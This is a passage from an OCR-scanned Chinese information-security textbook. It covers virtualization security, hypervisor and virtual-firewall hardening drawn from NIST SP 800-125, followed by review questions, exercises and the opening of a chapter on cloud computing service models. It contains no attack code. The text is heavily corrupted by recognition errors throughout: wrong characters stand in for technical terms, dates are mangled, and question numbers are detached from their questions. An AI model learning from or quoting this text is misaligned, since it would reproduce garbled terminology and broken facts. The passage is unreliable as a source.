本 地 虚拟 化 系统 通常 在 服务 器 当中 见 到 ， 因 为 服务 器 的 目标 是 提高 硬件 的 使 用 效率 。 一 般 
认为 本 地 虚拟 化 系统 更 为 安全 ， 因 为 相 比 主机 虚拟 化 而 言 ， 其 上 增加 的 额外 层次 更 少 。 主 机 虚 
拟 化 系统 在 客户 端 系统 中 更 为 常见 ， 因 为 它们 还 要 在 主机 操作 系统 中 运行 其 他 应 用 程序 ， 使 用 
虚拟 机 的 目的 是 想 使 用 其 他 操作 系统 版 本 和 其 他 类 型 的 应 用 。 

在 虚拟 化 系统 中 ， 可 用 的 硬件 资源 必须 被 多 个 客机 操作 系统 所 共享 。 这 些 资源 包括 CPU、 
内 存 、 硬 盘 、 网 络 以 及 其 他 附属 设备 。CPU 和 内 存 通常 在 这 些 客机 操作 系统 中 进行 划分 ， 按 
需 调 度 。 硬 盘 也 可 能 被 划分 ， 每 个 客机 操作 系统 都 有 一 块 独占 的 硬盘 资源 。 或 者 每 一 个 客机 操 
作 系 统 都 会 创建 一 个 虚拟 硬盘 ， 虚 拟人 硬盘 在 用 户 视角 看 起 来 是 以 全 系统 的 一 块 物理 硬盘 的 形态 
存在 ， 然 而 在 外 部 看 起 来 却 是 一 个 底层 文件 系统 上 的 硬盘 镜像 。 光 盘 或 者 USB 这 些 附 属 设备 
通常 一 次 只 分 配给 一 个 客机 操作 系统 。 

对 于 网 络 的 访问 则 有 几 种 可 选 的 方案 。 客 机 操作 系统 可 以 直接 访问 系统 的 网 卡 ， 由 管理 程 
序 协调 共享 接口 的 访问 ; 或 者 管理 程序 为 每 个 客机 操作 系统 实现 一 个 虚拟 网 卡 ， 根 据 需 要 在 不 
同 客 机 之 间 进 行路 由 。 后 一 种 方法 更 加 高 效 和 常见 ， 因 为 不 同 客 机 操作 系统 间 的 流量 不 必 通 过 
外 部 网 络 连接 进行 转发 。 正 如 我 们 在 第 9 章 讨论 的 ， 这 些 流量 不 受 网 络 监 视 器 的 控制 ， 的 确 存 
在 一 些 安全 问题 。 

当 一 个 数字 虚拟 化 系统 与 虚拟 机 管理 器 被 共同 组 合 在 一 个 数据 中 心 或 者 甚至 连接 在 数据 
中 心 之 间 时 ， 各 种 系统 需要 连接 到 适当 的 网 络 段 ， 并 通过 适当 的 路 由 和 防火 墙 连 到 一 起 后 连 
接 到 网 络 。 我 们 稍 后 将 在 第 13 章 中 讨论 的 云 计 算 解 决 方案 就 使 用 了 该 结构 ， 一 些 大 型 组 织 
的 计算 方法 也 是 如 此 。 正 如 我 们 在 第 8 章 和 第 9 章 中 讨论 的 那样 ， 网 络 连 接 可 以 通过 物理 、 
外 部 、 链 接 或 使 用 ID 和 防火 墙 等 方式 将 其 连接 到 一 起 。 然 而 ， 这 种 方式 限制 了 虚拟 化 解决 
方案 的 灵活 性 ， 因 为 虚拟 机 只 能 通过 已 经 存在 的 必要 物理 网 络 连接 迁移 到 其 他 主机 。 尽 管 
VLANs 仍然 受到 物理 网 络 连接 和 VLAN 配置 的 限制 ， 但 其 依旧 可 以 在 网 络 体系 结构 中 提供 
更 多 的 灵活 性 。 

软件 定义 网 络 ( SDN) 仍然 可 以 提供 更 大 的 灵活 性 ， 在 使 用 相同 底层 物理 网 络 的 情况 下 ， 
它 使 得 网 络 段 能 够 在 逻辑 层面 于 数据 中 心 之 间 跨 越 多 个 服务 融 。 现 有 几 种 可 能 的 方式 来 提供 
SDN， 包 插 使 用 覆盖 网 络 ( overlay network) 在 内 。 这 些 方法 将 所 有 2 层 和 3 层 的 地 址 从 底层 
物理 网 络 抽象 到 任何 逻辑 网 络 结构 需要 的 形式 。 而 且 这 种 结构 很 容易 根据 需要 进行 更 改 和 扩 
Eo IETF 标准 分 布 式 覆盖 虚拟 网 络 (DOVE) 使 用 可 扩展 虚拟 局 域 网 ( VXLAN) 来 实现 这 样 
的 覆盖 网 络 。 有 了 这 个 灵活 的 结构 ， 就 可 以 根据 需要 在 网 络 的 任何 地 方 定位 虚拟 服务 器 、 虚 拟 
IDS 和 虚拟 防火 墙 。 我 们 将 在 本 节 后 面 进一步 讨论 安全 虚拟 网 络 和 防火 墙 的 使 用 。 
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容器 ”这 是 一 个 相对 较 新 的 虚拟 化 方法 ， 它 被 称 为 容器 虚拟 化 或 应 用 程序 虚拟 化 ， 值 得 注 
意 的 是 (如 图 12-2c 所 示 )， 在 这 种 方法 中 ， 被 称 为 虚拟 化 容器 的 软件 运行 在 主机 操作 系统 内 核 
之 上 ， 并 为 应 用 程序 提供 一 个 隔离 的 执行 环境 。 与 基于 虚拟 机 管理 融 的 虚拟 机 不 同 ， 容 融 的 目 
的 并 不 是 模拟 物理 服务 右 。 相 反 ， 主 机 上 所 有 容 需 化 应 用 程序 都 共享 一 个 共同 的 OS 内 核 。 这 
就 消除 了 每 个 应 用 程序 运行 单独 操作 系统 所 需要 的 资源 ， 并 且 可 以 大 大 减少 开销 。 

对 于 容器 来 说 ， 只 要 有 一 个 小 容器 引擎 作为 对 容器 的 支持 就 足够 了 。 容 需 引 擎 通过 为 每 个 
容 需 请 求 操 作 系统 的 专用 资源 来 将 每 个 容 融 设置 为 单独 的 实例 。 之 后 ， 每 个 容 需 应 用 程序 就 可 
以 直接 使 用 主机 操作 系统 的 资源 。 虚 拟 机 虚拟 化 功能 位 于 硬件 和 操作 系统 的 边界 。 它 能 够 用 虚 
拟 机 和 虚拟 机 管理 融 之 间 的 狭 罕 接 口 提供 强大 的 性 能 隔离 和 安全 保证 。 在 操作 系统 和 应 用 程序 
之 间 的 容 需 化 会 齐 来 更 低 的 开销 ， 但 是 可 能 会 市 来 更 大 的 安全 漏洞 。 


12.8.2 ”虚拟 化 安全 问题 


[CLEE09] 和 NIST SP 800-125 (全 面 虚 拟 化 技术 安全 指南 ，2011 年 1 A) 都 给 出 了 一 些 因 
使 用 虚拟 化 系统 而 产生 的 安全 问题 ， 内 容 主 要 包括 : 

e 客机 操作 系统 独立 ， 即 确保 运行 在 某 一 客机 操作 系统 内 的 程序 只 访问 分 配给 该 系统 的 

资源 ， 而 不 会 与 其 他 客机 操作 系统 的 数据 或 者 管理 程序 的 数据 进行 交互 。 

© 客机 操作 系统 是 被 管理 程序 所 监控 的 ， 管 理 程序 有 权力 访问 任何 客机 操作 系统 的 程序 

和 数据 。 管 理 程序 的 这 种 访问 行为 必须 是 安全 的 和 可 信任 的 。 

o 虚拟 化 环境 安全 ， 尤 其 是 攻击 者 可 能 想 要 看 到 和 修改 的 镜像 和 快照 的 管理 。 

这 些 安全 问题 都 可 以 作为 我 们 已 经 讨论 过 的 加 固 操作 系统 和 应 用 的 扩展 。 如 果 某 种 操作 
系统 和 应 用 配置 直接 运行 在 真实 硬件 上 时 是 脆弱 的 ， 那么 它 运 行 在 虚拟 环境 中 可 能 更 脆弱 。 如 
果 该 系统 被 攻破 了 ， 那 么 攻击 者 至 少 有 能 力 攻击 它 附 近 的 系统 ， 无 论 是 其 他 的 客机 操作 系统 还 
是 硬件 上 的 真实 操作 系统 。 与 管理 程序 亲自 监控 所 有 本 地 运行 的 程序 相 比 ， 虚 拟 化 环境 的 使 用 
可 以 通过 进一步 隔离 网 络 流量 来 改善 安全 性 。 然 而 ， 虚 拟 化 环境 和 管理 程序 的 存在 也 可 能 降低 
安全 性 ， 因 为 这 些 环境 可 能 存在 安全 漏洞 ， 这 些 漏洞 可 能 允许 客机 操作 系统 的 程序 访问 管理 程 
序 ， 进 而 访问 到 其 他 客机 操作 系统 。 我 们 在 6.8 节 讨 论 的 “虚拟 机 逃逸 ”( VM escape) 就 是 这 
样 一 个 例子 。 虚 拟 化 系统 也 可 以 通过 快照 功能 挂 起 一 个 正在 运行 的 客机 操作 系统 ， 保 存 成 镜 
像 ， 在 一 段 时 间 后 重新 运行 ， 甚 至 可 以 换 到 另外 一 个 系统 中 来 运行 。 如 果 攻 击 者 能 够 访问 或 修 
改 这 个 镜像 ， 那 么 他 就 能 危害 到 镜像 内 数据 和 程序 的 安全 。 

因此 正如 我 们 前 面 所 讲 的 ， 虚 拟 化 系统 的 使 用 增加 了 一 个 我 们 需要 额外 关心 的 层次 。 加 固 
虚拟 化 系统 意味 着 需要 加 固 额 外 增加 的 这 一 层 。 除 去 加 固 每 个 客机 操作 系统 和 应 用 之 外 ， 虚 拟 
化 环境 和 管理 程序 也 要 加 固 。 


12.8.3 ”加固 虚拟 化 系统 


NIST SP 800-125 针对 拟 化 安全 给 出 了 适当 的 指导 ， 它 指出 使 用 虚拟 化 技术 的 组 织 或 机 构 
应 该 : 

o 仔细 规划 虚拟 化 系统 的 安全 。 

e 加 固 全 虚拟 化 解决 方案 的 所 有 元 素 ， 包 括 管理 程序 、 客 机 操作 系统 、 虚 拟 化 架构 ， 并 

旦 维护 它们 的 安全 。 

o 确保 管理 程序 经 过 了 正确 的 加 固 。 

e 限制 和 保护 管理 员 对 虚拟 化 解决 方案 的 访问 。 

正如 我 们 在 本 章 前 面 提 到 的 ， 很 明显 可 以 看 到 这 就 是 系统 加 固 过 程 的 一 个 扩展 。 
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虚拟 机 管理 器 安全 ”虚拟 机 管理 融 应 该 使 用 类 似 加 固 操作 系统 的 方法 进行 加 固 。 也 就 是 
说 ， 它 应 该 通过 干将 的 妹 介 在 陋 离 的 环境 下 安 闪 ， 并 且 打 上 最 新 的 补丁 以 减少 漏洞 的 数量 。 之 
后 应 该 给 它 配置 目 动 更 新 ， 禁 用 或 者 删除 所 有 不 需要 的 服务 ， 断 开 没 用 的 硬件 设备 ， 客 机 操作 
系统 应 该 有 适当 的 目 检 人 能力， 应 该 时 刻 监视 虚拟 机 管理 副 以 及 时 发 现 被 攻击 的 信号 。 

应 该 仅 允 许 授权 的 管理 员 访 问 管理 程序 ， 因 为 访问 虚拟 机 管理 器 的 这 些 人 可 以 访问 和 监 
视 任 何 客机 操作 系统 。 虚 拟 机 管理 需 可 以 支持 本 地 和 远程 管理 。 这 一 定 要 正确 配置 ， 并 使 用 合 
适 的 身份 认证 和 加 密 机 制 ， 尤 其 是 使 用 远程 管理 的 情况 下 。 远 程 管理 访问 应 该 在 网 络 防 火 墙 和 
IDS 的 控制 范围 内 进行 。 理 想 状 态 下 ， 如 果 可 能 的 话 ， 这 种 管理 行为 应 该 使 用 独立 的 网 络 ， 该 
网 络 只 有 非 芝 有 限 的 外 部 访问 权限 。 


12.8.4 ”虚拟 化 架构 安全 


更 广泛 的 虚拟 化 架构 需要 更 仔细 的 管理 和 配置 。 虚 拟 化 系统 的 虚拟 机 管理 器 会 对 硬件 资源 
(如 硬盘 存储 和 网 络 接口 ) 的 访问 进行 管理 。 这 种 访问 必须 仅 限于 适当 的 使 用 各 种 资源 的 客户 
系统 ， 以 及 适当 安排 的 网 络 连 接 。 对 虚拟 机 映像 和 快照 的 访问 也 必须 仔细 地 控制 ， 因 为 这 是 一 
个 潜在 的 攻击 点 。 

当 我 们 使 用 多 个 虚拟 化 系统 时 ，NIST SP 800-125B (保护 虚拟 机 的 安全 虚拟 网 络 配 置 ， 
2016 4F 3 A) 指出 了 三 类 不 同 的 网 络 通信 : 

e 管理 通信 : 用 于 虚拟 化 架构 的 虚拟 机 管理 紫 管 理 和 配置 。 

e 架构 通信 : 例如 VM 映像 的 迁移 ， 或 到 网 络 存储 技术 的 连接 。 

e 应 用 程序 通信 : 在 运行 VM 的 应 用 程序 和 连接 到 外 部 的 网 络 之 间 ， 这 种 通信 可 以 进 一 

步 分 为 奋 干 段 ， 将 通信 与 具有 不 同 敏 感 等 级 的 应 用 程序 或 者 不 同 组 织 或 部 门 隔 离开 来 。 

上 述 每 一 种 通信 都 应 被 适当 地 隔离 与 保护 ， 这 就 需要 使 用 一 些 网 络 段 ， 这些 网 络 段 需要 
根据 由 适当 的 防火 墙 系统 连接 。 为 了 提供 稳定 的 网 络 结构 ， 它 们 可 能 会 使 用 不 同 的 物理 网 络 连 
ik. VLANs 或 软件 定义 网 络 的 组 合 。 人 例如， 在 比较 大 的 安装 中 ， 管 理 和 架构 通信 可 能 会 使 用 
相对 静态 的 物理 网 络 连接 ， 而 应 用 程序 通信 可 能 会 使 用 更 加 灵活 的 VLANs 或 位 于 单独 基础 物 
理 网 络 结构 层次 之 上 的 软件 定义 网 络 。 


12.8.5 ”虚拟 防火 墙 


正如 我 们 在 9.4 节 中 所 提 到 的 ， 虚 拟 防火 墙 为 虚拟 环境 或 云 环境 中 的 系统 之 间 的 网 络 通信 
提供 防火 墙 功 能 ， 这 种 系统 不 需要 将 该 通信 路 由 到 支持 传统 防火 墙 服务 的 物理 独立 网 络 。 这 些 
功能 可 由 以 下 提供 : 
© 虚拟 机 堡垒 主机 : 在 这 种 情况 下 ， 一 个 独立 的 虚拟 机 被 用 作 一 个 堡垒 主机 ， 支 持 相 同 
的 防火 墙 系 统 和 服务 ， 这 些 防火 墙 系 统 和 服务 可 以 配置 为 在 独立 的 堡垒 上 运行 ， 包括 
可 能 的 IDS 和 IPS 服务 在 内 。 被 其 他 虚拟 机 使 用 的 网 络 连接 会 被 配置 为 接 入 合适 的 子 
网 络 。 它 们 连接 到 虚拟 机 堡垒 主机 上 不 同 的 虚拟 网 络 接口 ， 这 个 堡垒 主机 可 以 以 相同 
的 方式 监视 和 路 由 它们 之 间 的 通信 ， 并 有 与 物理 分 离 的 堡垒 主机 具有 相同 配置 的 可 能 
性 。 这 些 系统 可 以 作为 一 个 虚拟 UTM 被 安装 到 一 个 经 过 适当 加 固 的 虚拟 机 中 ， 该 虚 
拟 机 可 以 根据 需要 被 轻松 地 加 载 、 配 置 和 运行 。 但 这 种 方法 有 一 个 缺点 ， 那 就 是 这 些 
虚拟 堡垒 会 与 系统 上 的 其 他 虚拟 机 争夺 同一 个 虚拟 机 管理 器 主机 资源 。 
。 基于 主机 的 虚拟 机 防火 墙 : 在 这 种 情况 下 ， 基 于 主机 的 防火 墙 功能 被 配置 为 以 同 于 物 
理 上 独立 系统 中 使 用 的 方式 来 保护 主机 ， 而 这 个 基于 主机 的 防火 墙 是 运行 在 客机 操作 
系统 上 的 虚拟 机 提供 的 。 
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。 虚拟 机 管理 器 防火 墙 : 在 这 种 情况 下 ， 防 火 墙 功能 直接 由 虚拟 机 管理 需 提 供 。 这 些 功 
能 所 涵盖 的 范围 由 在 虚拟 机 之 间 转 发 网 络 通信 的 虚拟 网 络 交 换 机 中 无 状态 或 有 状态 的 
数据 报到 一 个 能 监视 虚拟 机 中 所 有 活动 程序 的 完整 虚拟 机 管理 器 防火 墙 。 后 一 种 变化 
提供 了 基于 主机 和 堡垒 主机 的 防火 墙 功 能 ， 但 其 是 从 传统 主机 和 网 络 结构 之 外 的 位 置 
提供 的 。 它 比 其 他 代替 方案 更 加 安全 ， 因 为 它 既 不 是 虚拟 化 网 络 的 一 部 分 ， 也 不 像 单 
独 的 虚拟 机 一 样 可 见 。 它 也 可 能 比 其 他 方法 更 加 有 效 。 因 为 硬件 上 直接 运行 的 虚拟 机 
管理 天 核心 中 发 生 了 资源 监视 与 过 滤 。 但 是 这 种 方式 需要 一 个 文 持 它 这 些 特性 的 虚拟 
机 管理 硕 ， 而 具备 这 些 特 性 的 管理 需 也 就 增加 了 它 上 自身 的 复杂 程度 。 

当 在 大 规模 虚拟 化 环境 中 使 用 时 ， 在 有 许多 虚拟 系统 连接 到 VLAN 或 有 横 跨 一 个 或 多 个 
数据 中 心 的 软件 定义 网 络 的 情况 下 ， 虚 拟 防 火 墙 堡垒 可 以 根据 需要 被 分 配 和 定位 到 合适 资源 可 
用 的 地 方 。 这 就 提供 了 比 许多 传统 结构 能 支持 的 更 高 的 灵活 性 和 可 扩展 性 等 级 。 但 是 ， 我 们 可 
能 仍然 需要 一 些 物 理 防火 墙 系统 ， 尤 其 是 在 要 文 持 虚拟 机 服务 器 之 间 (或 与 更 大 型 网 络 连接 时 ) 
产生 的 极 大 流量 的 情况 下 。 

主机 虚拟 化 安全 通常 用 在 客户 端 中 的 主机 虚拟 化 系统 也 带 来 了 一 些 额 外 的 安全 问题 。 这 
些 问 题 是 由 主机 操作 系统 内 ， 其 他 应 用 程序 劳 的 管理 程序 以 及 客机 操作 系统 所 市 来 的 。 因 此 有 
更 多 的 层 需 要 加 固 。 进 一 步 讲 ,这 种 系统 的 用 户 通常 对 管理 程序 和 虚拟 机 镜像 以 及 快照 有 全 部 
的 访问 和 配置 权限 。 在 这 种 情况 下 ， 虚 拟 化 的 使 用 主要 是 为 了 提供 额外 的 特性 以 及 支持 多 个 操 
作 系统 和 应 用 的 使 用 ， 而 不 是 将 各 个 系统 互相 隔离 给 不 同 的 用 户 使 用 。 

设计 一 个 对 于 用 户 来 说 访问 和 修改 更 为 安全 的 主机 系统 和 虚拟 化 方案 是 可 行 的 。 这 种 方法 
可 以 用 来 支持 全 方位 加 固 的 客机 操作 系统 镜像 ， 用 来 提供 对 企业 网 络 和 数据 的 访问 ， 用 来 支持 
这 些 镜像 的 统一 管理 和 更 新 。 然 而 ， 除 非 经 过 充分 的 加 固 和 管理 ， 和 否则 这 种 底层 操作 系统 之 上 
的 主机 虚拟 化 方案 仍然 会 存在 安全 问题 。 


129 关键 术语 、 复 习题 和 习题 


关键 术语 

access controls (访问 控制 ) hypervisor (虚拟 机 管理 器 ) 
administrators (管理 员 ) logging (日 志 ) 

application virtualization (应 用 虚拟 化 ) native virtualization (本 地 虚拟 化 ) 
archive (存档 ) overlay network (覆盖 网 络 ) 

backup (备份 ) patches (补丁 ) 

chroot (改变 根 目录 ) patching ( 打 补 丁 ) 

container virtualization (容器 虚拟 化 ) permissions (权限 ) 

full virtualization (全 虚拟 化 ) software defined network (软件 定义 网 络 ) 
guest OS (客机 操作 系统 ) type | hypervisor (一 型 虚拟 机 管理 器 ) 
hardening (加 固 ) type 2 hypervisor (二 型 虚拟 机 管理 器 ) 
hosted virtualization (主机 虚拟 化 ) virtualization (虚拟 化 ) 

复习 题 


12.1 加 固 系 统 的 基本 步骤 是 什么 ? 
12.2 系统 安全 规划 的 目的 是 什么 ? 
12.3 ”加固 基 本 操作 系统 的 基本 步骤 是 什么 ? 
12.4 ”为 什么 让 所 有 软件 尽快 更 新 如 此 重要 ? 
12.5 ”自动 更 新 的 优势 和 劣势 是 什么 ? 
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12.6 
12.7 
12.8 
12.9 
12.10 
12.1] 
12.12 
12.13 
12.14 
12.15 
12.16 
12.17 
12.18 
12.19 
12.20 
12:21 
12.22 
12.23 
12.24 
12.25 
12.26 


习题 
12.1 
12.2 


12.3 


12.4 


12.5 


12.6 
12.7 
12.8 


12.9 


12.10 


移 除 不 必要 的 服务 、 应 用 和 协议 有 什么 意义 ? 

用 于 加 固 基 本 操作 系统 的 额外 安全 工具 都 有 哪些 ? 

用 于 加 固 关键 应 用 的 额外 步骤 是 什么 ? 

用 来 维护 系统 安全 的 步骤 是 什么 ? 
在 UNIX 和 Linux 系统 中 ， 应 用 和 服务 的 配置 信息 在 什么 地 方 ? 
在 UNIX 和 Linux 系统 中 ， 实 现 了 什么 样 的 访问 控制 模型 ? 
权限 是 什么 ? 用 在 哪里 ? 
在 UNIX Ail Linux 系统 中 ， 什 么 命令 可 以 用 来 操作 访问 控制 列表 ? 
Æ UNIX 和 Linux 系统 中 执行 文件 时 ,设置 用 户 和 用 户 组 会 产生 什么 影响 ? 
在 Linux 系统 中 ， 主 要 使 用 的 主机 防火 墙 程序 是 什么 ? 
滚动 日 志文 件 为 何 重要 ? 
在 UNIX 和 Linux 系统 中 ，chroot 监牢 怎样 提高 应 用 的 安全 性 ? 
在 Windows 系统 中 ， 用 户 和 组 信息 存在 哪 两 个 地 方 ? 
在 UNIX/Linux 系统 和 在 Windows 系统 中 ， 访 问 控制 模型 的 实现 有 什么 主要 区 别 ? 
在 Windows 系统 中 使 用 的 强制 完整 性 控制 是 什么 ? 
在 Windows 系统 中 ， 什 么 特权 能 覆盖 所 有 的 ACL 检查 ， 为 什么 ? 
在 Windows 系统 中 ， 应 用 和 服务 的 配置 信息 保存 在 哪里 ? 
什么 是 虚拟 化 ? 
我 们 讨论 了 什么 虚拟 化 加 固 方案 ? 
虚拟 化 系统 中 主要 的 安全 问题 是 什么 ? 
加 固 虚 拟 化 系统 的 基本 步骤 是 什么 ? 


陈述 在 系统 中 进程 以 管理 员 或 root 权限 运行 时 可 能 产生 的 威胁 。 
用 户 设置 (setuid) 和 组 设置 (setgid) 程序 是 由 UNIX 用 于 管理 敏感 资源 访问 所 支持 的 一 个 强大 机 制 ， 
然而 其 中 的 潜在 安全 漏洞 可 能 会 危机 整个 系统 。 描 述 一 个 可 用 于 定位 所 有 用 户 设置 或 组 设置 的 程 
序 ， 并 说 明 如 何 利用 这 些 信息 。 
为 什么 文件 系统 权限 在 Linux DAC 模型 中 如 此 重要 ? 这 和 Subject-Action-Object 事务 的 概念 有 什么 
对 应 关系 ? 
FAP ahmed 拥有 一 个 目录 stuff， 其 中 包含 名 为 ourstuff.txt 的 文本 文件 ， 该 文件 由 staff 组 所 共享 。 
组 内 的 这 些 用 户 可 以 读 取 并 更 改 该 文件 ， 但 是 不 能 删除 它 。 也 不 能 在 本 目录 下 创建 新 文件 。 其 他 
组 的 用 户 不 可 以 访问 该 目录 。 和 那么 ， 该 如 何 设置 目录 stuff 和 文件 ourstuff.ext 的 所 有 者 权限 ? 
假设 你 正在 管理 Apache Linux Web 服务 器 上 你 公司 的 电子 交易 网 站 ， 有 一 个 名 为 WorminatorX 的 
蠕虫 病毒 利用 Apache Web 服务 包 中 的 缓冲 区 溢出 漏洞 获取 到 了 主机 远程 root 权限 。 构 建 一 个 简单 的 
安全 威胁 模型 ， 描 述 其 中 的 威胁 : 攻击 者 、 攻 击 向 量 、 漏 洞 、 资 源 、 产 生 的 影响 和 合理 的 规避 方法 。 
为 什么 日 志 系 统 非常 重要 ? 它 作 为 安全 控制 工具 有 什么 限制 ?记录 远程 日 志 有 什么 优势 和 劣势 ? 
考虑 一 个 自动 的 审计 日 志 分 析 工 具 (例如 ，swatch)， 能 提出 哪些 可 用 于 识别 系统 中 可 疑 行为 的 规则 ? 
使 用 文件 完整 性 检查 工具 (如 tripwire) 的 优势 和 劣势 是 什么 ?该 工具 将 任何 文件 的 变更 情况 通知 
管理 员 。 考 虑 一 下 ， 哪 些 文件 你 希望 它 的 变更 尽量 少 一 些 ， 哪 些 文件 可 能 经 常 变更 。 讨 论 哪些 因 
素 影响 该 工具 的 配置 ， 文 件 系统 的 哪些 部 分 被 扫描 ， 监 控 其 响应 的 工作 量 有 多 大 ? 
有 些 人 认为 UNIX/Linux 操作 系统 在 很 多 场景 下 复 用 一 些 安全 特性 ， 而 Windows 操作 系统 针对 不 
同 的 安全 场景 提供 针对 性 的 安全 特性 。 这 是 在 简易 但 缺乏 灵活 性 与 复杂 但 更 有 针对 性 之 间 的 权衡 。 
讨论 各 自 安 全 策略 对 系统 的 影响 ， 以 及 安全 管理 员 在 其 中 所 处 的 位 置 。 

当 使 用 BitLocker 加 密 笔 记 本 电脑 时 不 应 该 使 用 待机 模式 ， 而 推荐 使 用 睡眠 模式 ， 这 是 为 什么 ? 
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学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
给 出 云 计算 概念 的 概述 ; 
列 出 并 定义 主要 的 云 服务 ; 
列 出 并 定义 云 部 署 模型 ; 
解释 NIST 云 计算 参考 架构 ; 
描述 云 安 全 即 服务 ，; 


理解 云 安 全 的 OpenStack 安全 模块 ， 
解释 物 联网 的 范围 ; 

列 出 并 讨论 物 联 化 (loT-enabled) 事物 的 五 个 主要 组 件 ; 
理解 云 计 算 与 IoT 之 间 的 关系 ; 

定义 修补 漏洞 ; 

解释 IoT 安全 框架 ; 

理解 无 线 传感器 网 络 的 MiniSec 安全 特性 。 





云 计算 和 物 联 网 (Internet of Things, IoT) 是 近年 来 计算 领域 最 重要 的 两 项 进展 。 在 
这 两 个 领域 中 ， 针 对 环境 的 具体 要 求 量 身 定制 的 安全 措施 也 在 不 断 发 展 。 本 章 首 先 概述 云 
计算 的 概念 ， 其 次 讨论 云 安全 。 再 次 ， 本 章 还 将 探讨 物 联网 的 概念 ， 并 以 讨论 物 联 网 安全 
结束 。 

13.1 节 和 13.4 节 中 云 计 算 和 oT 的 更 多 详细 信息 ， 请 参见 [STAL16a]。 


13.1 云 计算 


许多 组 织 将 其 主要 其 至 全 部 的 信息 技术 CIT) 操作 转移 到 与 Internet 连接 的 基础 设施 上 ， 
即 企业 级 云 计算 ， 此 可 谓 大 势 所 趋 。 然 而 ,使 用 云 计 算 会 引发 一 些 安 全 问题 ， 尤 其 是 在 数据 库 
安全 方面 。 本 节 对 云 计 算 进 行 综 述 ， 而 13.2 节 讨 论 云 计算 安全 。 


13.1.1 云 计算 要 素 


NIST 在 NIST SP 800-145 (NIST 云 计算 定义 ，2011 年 9 月 ) tp, 以 如 下 形式 定义 了 云 
HA: 


云 计算 : 云 计算 是 一 种 可 提供 普 适 且 便 捷 的 通过 网 络 按 需 访问 可 配置 计算 资源 (如 网 络 、 
服务 器 、 存 储 、 应 用 软件 和 服务 ) 的 共享 池 模 型 ， 而 且 只 需 投 入 很 少 的 管理 工作 或 与 服务 
提供 者 进行 很 少 的 交互 ， 这 些 资源 就 可 以 被 迅速 地 供应 和 释放 。 该 云 模型 由 五 种 基本 特 
征 、 三 种 服务 模型 和 四 种 部 署 模型 组 成 ， 提 高 了 资源 的 可 用 性 。 424 





该 定义 涉及 多 种 模型 和 特征 ， 它 们 之 间 的 关系 如 图 13-1 所 示 。 云 计算 的 基本 特征 包括 : 
© 广泛 的 网 络 接 入 (broad network access): 通过 网 络 和 标准 机 制 ， 实 现 各 种 不 同 的 客户 
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平台 〈 例 如， 移动 电话 、 笔 记 本 电脑 和 平板 电脑 )， 以 及 其 他 传统 的 或 基于 云 的 软件 服 
务 对 云 资 源 的 访问 功能 。 

© 快速 伸缩 性 (rapid elasticity); 云 计 算 赋 予 客户 根据 目 己 的 特定 服务 需求 来 拓展 和 缩减 

使 用 资源 的 能 力 。 例 如 ， 在 执行 一 项 特定 任务 时 可 能 需要 大 量 服务 需 资 源 ， 并 在 完成 

该 任务 后 将 资源 释放 。 

可 测量 的 服务 (measured service): 通过 利用 适合 于 服务 类 型 (例如 ， 存 储 人 器、 处理 器 、 

带宽 和 活跃 用 户 账 户 ) 的 某 种 抽象 级 别 的 测量 能 力 ， 云 系统 能 够 自动 控制 和 优化 资源 

使 用 。 鉴 于 所 用 服务 对 服务 提供 者 和 客户 是 透明 的 ， 资 源 的 使 用 情况 可 以 被 监测 、 控 

制 和 公布 。 

© 按 需 自 服务 (on-demand self-service): 如 果 需 要 的 话 ， 云 服务 客户 (CSC) 可 自动 地 单 
癌 提供 计算 能 力 ( 例 如， 服务 时 间 和 网 络 存 储 器 )， 而 无 须 与 每 个 服务 提供 者 进行 人 为 
交互 。 由 于 服务 是 按 需 提供 的 ， 资 源 不 是 客户 拥有 的 IT 基础 设施 的 永久 部 分 。 

e 资源 池 (resource pooling): 采用 多 租户 (multi-tenant) 模型 ， 动 态 地 分 配 和 重 分 配 不 同 
物理 和 虚拟 资源 ， 根 据 客户 的 不 同 需 求 ， 提 供 者 的 计算 资源 池 化 ， 为 多 重 云 服务 客户 
提供 服务 。 资 源 的 位 置 具有 一 定 的 独立 性 ， 即 客户 一 般 无 法 控制 并 且 无 从 得 知 其 所 得 
资源 的 确切 来 源 ， 但 是 能 够 在 更 高 级 别 的 抽象 层 中 确定 其 位 置 (如 国家 、 州 或 数据 中 
心 )。 资 源 的 例子 包括 存储 器 、 处 理 器 、 内 存 、 网 络 带 宽 和 虚拟 机 ( VM) 等 。 私 有 云 
其 至 倾向 于 将 同一 组 织 的 不 同 部 门 间 的 计算 资源 池 化 。 


基本 特征 


服务 模型 


部 署 模型 





图 13-1 云 计算 要 素 


13.1.2 云 服务 模型 


NIST SP 800-145 定义 了 三 种 服务 模型 ， 可 被 看 作风 套 的 可 选 服 务 : 软件 即 服 务 ( SaaS)、 
平台 即 服 务 (PaaS) 和 基础 设施 即 服务 CaaS). 

软件 即 服务 ”SaaSs 以 软件 (特别 是 应 用 程序 ) 的 形式 将 服务 提供 给 客户 ， 可 接 人 并 运 
{TED i, SaaS 遵循 常见 的 Web 服务 模型 ， 因 而 适用 于 云端 资源 。SaaS 允许 客户 在 提供 者 
的 云端 基础 设施 上 运行 提供 者 的 应 用 程序 。 应 用 程序 可 被 各 种 客户 端 设备 通过 简单 接口 (如 
Web 浏览 器 ) 访问 。 企 业 无 须 为 其 使 用 的 软件 产品 获取 桌面 和 服务 器 许可 证 ， 而 可 以 从 云 
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服务 获得 相同 的 功能 。SaaS 的 使 用 避免 了 软件 安装 、 维 护 、 升 级 以 及 打 补 丁 等 复杂 的 工作 。 
此 级 别 的 服务 示例 有 Google Gmail, Microsoft 365, Salesforce, Citrix GoToMeeting 和 
Cisco WebEx 等 。 

SaaS 的 普通 客户 是 那些 希望 为 其 员工 提供 典型 办 公 生 产 软 件 (如 文档 管理 和 电子 邮件 ) 的 
组 织 。 个 人 也 常常 使 用 SaaS 模型 来 获取 云 资源 。 一 般 情况 下 ， 客 户 按 需 使 用 特定 的 应 用 程序 。 
云 提供 者 通常 还 提供 与 数据 相关 的 功能 ， 例 如 客户 之 间 的 自动 备份 和 数据 共享 等 。 

平台 即 服务 Paas 云 以 平台 的 形式 将 服务 提供 给 客户 ,客户 的 应 用 程序 可 以 运行 在 该 
平台 上 。PaaS 允许 客户 在 云端 基础 设施 上 部 署 自己 创建 或 获取 的 应 用 程序 。Paas 云 提供 了 
有 用 的 软件 构建 组 件 和 一 些 开 发 工具 ， 如 程序 语言 工具 、 运 行 时 环境 以 及 其 他 有 助 于 部 署 新 
